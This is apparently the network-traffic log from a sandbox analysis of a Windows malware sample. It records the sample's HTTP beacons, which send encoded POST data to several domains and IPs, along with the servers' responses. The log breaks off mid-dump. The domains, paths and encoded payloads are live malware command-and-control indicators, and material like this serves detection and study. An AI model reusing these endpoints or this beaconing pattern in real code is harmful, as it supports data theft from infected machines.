7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	217.160.0.106	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:23:50.436369896 CEST	510	OUT	GET /qe66/?kbRxoVY0=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&DnUL=_290s HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.catherineviskadi.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:23:51.070024967 CEST	770	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Thu, 29 Aug 2024 03:23:50 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	208.91.197.27	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:12.509845018 CEST	790	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d Data Ascii: kbRxoVY0=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	208.91.197.27	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:15.042155027 CEST	810	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d Data Ascii: kbRxoVY0=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	208.91.197.27	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:17.576500893 CEST	10892	OUT	POST /xzzi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.bfiworkerscomp.com Origin: http://www.bfiworkerscomp.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.bfiworkerscomp.com/xzzi/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 [TRUNCATED] Data Ascii: kbRxoVY0=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH96PvIqY72xOrJ4T78xXNc6citPuA/qhfgUwp6/5b4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9JBiqHKaoK6Iw9zKqdjrDW1ZFKDTWCzMqb9ndeTkbeAQuAElQInDj4sEwI7qEqQEo/40HtLR4cPECItmFJz8q2d6pU4Ll7VU2sZsAI1N9jsSxu+eTj6YbKXJv8fXXQqvG3BbGJskhF9Ve/wnRYhL+vXXqZZNGcGKVV7oYforgpXJpV3bcZ7DCMeRW7Q4foENPhAjoU1k/cFL2mm9gvpNiCf9X3hjL7s24pdlVzpUBejJjFPnHCKCLtRG8Qg2CQkZVaQe1zHyLzOMYQoYnUmTRlCeEKfq3CRh32Ny3Ni9lv8d+qKbPpzr/5XQKeEO3VWB6H0w96rKUdeKp7EoPDK2c/T03xZ9XKxqd47zb5IXLF0gw1CqvJoxn4C0BzUPdwFbrGTNJ7LEZyjUs1OgzEVCU+NYuhfr1wLdGLMIliXxTxIQ4XNR2rQzj+I1Su0kk1PiIl1P7lYqE1W8q7cpo3do02/UjfJugRn+Z3T4OqN905CBUBc40YcJjXZVlxb6yt0SulegB5Vyqw0Tkv5hbbxvtVC46sNp4Lg+/5tJTQW6EyDP5ReN2c/SOL9Qw/R9yo8Bk2QsMcpuIeWbe6f9fRkuy+olxap3NUgeloDC00V39WiomQYDqW1N+FpmL3yF9wb9tS0EzK7kFus2Mv/5VI365zo1jlEyxmNbHS04P9WqPbVzcBxdz1bCjN+OrYYRhDeL4DEjI19X+KLct1xHqmHD1cEqqeaEC7VViPP16JAXO8lYaiE6A [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	208.91.197.27	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:20.212661982 CEST	508	OUT	GET /xzzi/?DnUL=_290s&kbRxoVY0=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.bfiworkerscomp.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:24:22.138124943 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 03:24:20 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=932vr47244746114568555; expires=Tue, 28-Aug-2029 03:24:21 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 34 30 36 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 69 6e 42 36 6c 34 74 36 45 41 34 67 67 79 56 33 38 34 70 71 79 4e 33 41 6c 72 63 71 44 38 4f 35 6f 4d 32 44 65 34 4e 53 6c 6c 6b 65 4e 66 68 46 2b 59 35 6d 47 61 6b 71 52 51 71 34 74 5a 70 4c 6f 48 2b 50 58 48 70 46 52 45 55 31 7a 43 77 66 72 66 4a 34 65 77 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED] Data Ascii: 406c<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_inB6l4t6EA4ggyV384pqyN3AlrcqD8O5oM2De4NSllkeNfhF+Y5mGakqRQq4tZpLoH+PXHpFREU1zCwfrfJ4ew==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-t
Aug 29, 2024 05:24:22.138142109 CEST	1236	IN	Data Raw: 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 62 66 69 77 6f 72 6b 65 72 73 63 6f 6d 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 61 73 73 65 Data Ascii: o-fit=no"/> <title>bfiworkerscomp.com</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.
Aug 29, 2024 05:24:22.138159037 CEST	412	IN	Data Raw: 67 3a 31 72 65 6d 20 31 72 65 6d 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 Data Ascii: g:1rem 1rem 0; overflow:hidden;}h1 { color:#848484; font-size:1.5rem;}.header-text-color:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px;}.comp-sponsored {
Aug 29, 2024 05:24:22.138169050 CEST	1236	IN	Data Raw: 42 6c 61 63 6b 5f 36 35 37 64 39 30 31 33 2f 69 6d 67 2f 62 6f 74 74 6f 6d 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 34 30 70 78 3b Data Ascii: Black_657d9013/img/bottom.png') no-repeat center bottom; padding-bottom:140px;}.wrapper3 { background:#fff; max-width:300px; margin:0 auto 1rem; padding-top:1px; padding-bottom:1px;}.onDesktop { display:none;
Aug 29, 2024 05:24:22.138180017 CEST	224	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 66 61 6c 6c 62 61 63 6b 2d 74 65 72 6d 2d Data Ascii: background:none; }}</style> <style media="screen">.fallback-term-holder { display: inline-grid; grid-template-columns: 1fr; width: 100%; padding-top: 50px;}.fallback-term-link { grid-c
Aug 29, 2024 05:24:22.145715952 CEST	1236	IN	Data Raw: 6f 6c 75 6d 6e 3a 20 31 20 2f 20 73 70 61 6e 20 31 3b 20 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 30 70 78 20 31 33 70 78 20 35 30 70 78 20 31 33 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 Data Ascii: olumn: 1 / span 1; align-self: center; padding: 50px 13px 50px 13px; border-radius: 25px; border: 5px solid #ffffff; margin-bottom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; f
Aug 29, 2024 05:24:22.145762920 CEST	1236	IN	Data Raw: 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 20 32 20 2f 20 73 70 61 6e 20 32 3b 20 6a 75 73 74 69 66 79 2d 73 65 6c 66 3a 20 65 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 61 73 73 65 74 Data Ascii: <div style="grid-column: 2 / span 2; justify-self: end"> <img src="/assets/themes/registrar/images/logo_netsol.png" height="50" alt="Network Solutions"> </div> <div style="grid-column: 2 / span 2; justify-self: end"> <
Aug 29, 2024 05:24:22.145775080 CEST	1236	IN	Data Raw: 4f 44 63 35 4d 6d 55 79 4f 47 55 78 4f 44 4e 6c 4d 32 55 30 4d 6d 55 34 4d 32 4d 79 4f 54 41 30 4d 57 52 69 59 7a 45 25 33 44 2a 22 3e 52 65 76 69 65 77 20 6f 75 72 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0a 3c 62 72 3e 3c 62 72 Data Ascii: ODc5MmUyOGUxODNlM2U0MmU4M2MyOTA0MWRiYzE%3D*">Review our Privacy Policy</a><br><br><a href="https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf">Service Agreement</a><br><br><a href="https://www.networksolutions.com/">Le
Aug 29, 2024 05:24:22.145798922 CEST	672	IN	Data Raw: 63 68 42 75 74 74 6f 6e 27 3a 20 27 23 30 62 33 32 37 39 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 54 65 78 74 27 3a 20 27 23 66 66 66 27 0a 20 20 20 20 7d 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e Data Ascii: chButton': '#0b3279', 'colorSearchButtonText': '#fff' }; </script><script type="text/javascript">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTcyNDkwMTg2Mi4wMDM2OjQ3MTRhMTY1YTZmMGUyMzYwMjk3O
Aug 29, 2024 05:24:22.145945072 CEST	1236	IN	Data Raw: 7a 59 30 4d 6d 45 32 5a 6d 55 35 59 57 59 78 5a 6e 77 77 66 47 52 77 4c 58 52 6c 59 57 31 70 62 6e 52 6c 63 6d 35 6c 64 44 41 35 58 7a 4e 77 61 48 77 77 66 44 42 38 66 48 77 3d 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 64 6f 6d 61 69 6e 3d 27 Data Ascii: zY0MmE2ZmU5YWYxZnwwfGRwLXRlYW1pbnRlcm5ldDA5XzNwaHwwfDB8fHw='; let domain='bfiworkerscomp.com'; let scriptPath='https://rytrk.com'; let adtest='off';if(top.location!==location) { top.location.href=location.protocol + '//
Aug 29, 2024 05:24:22.145991087 CEST	224	IN	Data Raw: 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 22 2b 20 22 3f 74 6f 67 67 6c 65 3d 61 64 6c 6f 61 64 65 64 22 2b 20 22 26 75 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 6e Data Ascii: ery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeURIComponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': functi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	43.252.167.188	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:37.227816105 CEST	796	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d Data Ascii: kbRxoVY0=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==
Aug 29, 2024 05:24:38.120994091 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:32:46 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	43.252.167.188	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:39.761919975 CEST	816	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 